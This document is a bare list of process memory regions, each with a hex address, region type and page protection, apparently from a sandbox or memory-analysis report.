trusted library allocation
page execute and read and write
7FFD9BA20000
trusted library allocation
page read and write
1CC7271A000
heap
page read and write
7FFD9B970000
trusted library allocation
page read and write
1DFC2336000
heap
page read and write
7FFD9BB40000
trusted library allocation
page read and write
2A5B99B1000
heap
page read and write
EA43279000
stack
page read and write
745CECE000
stack
page read and write
1DFC1EDA000
heap
page read and write
1D0B4419000
heap
page read and write
1DFA9AF0000
trusted library allocation
page read and write
7FFD9BA30000
trusted library allocation
page execute and read and write
2487F470000
heap
page read and write
1DFA9865000
trusted library allocation
page read and write
1978E290000
heap
page read and write
7FFD9B763000
trusted library allocation
page execute and read and write
1DFC22F2000
heap
page read and write
1D09BDFF000
trusted library allocation
page read and write
1CC7771A000
trusted library allocation
page read and write
1CC7271B000
heap
page read and write
1DFA9A77000
trusted library allocation
page read and write
745D9FD000
stack
page read and write
2A5BB410000
unkown
page readonly
7FFD9B9E0000
trusted library allocation
page read and write
1CC72F90000
trusted library section
page readonly
7460DF8000
stack
page read and write
1D09BE48000
trusted library allocation
page read and write
1CC7271A000
heap
page read and write
2A5B99DC000
heap
page read and write
1CC72590000
trusted library section
page read and write
1D09BD45000
trusted library allocation
page read and write
1D0B451E000
heap
page read and write
1D0B43EE000
heap
page read and write
2A5B9953000
trusted library allocation
page read and write
7FFD9BA6B000
trusted library allocation
page read and write
745CE8E000
stack
page read and write
1D0AC5DE000
trusted library allocation
page read and write
1CC71E28000
heap
page read and write
1DFC233B000
heap
page read and write
1D0B430C000
heap
page read and write
1CC77600000
trusted library allocation
page read and write
1CC77770000
remote allocation
page read and write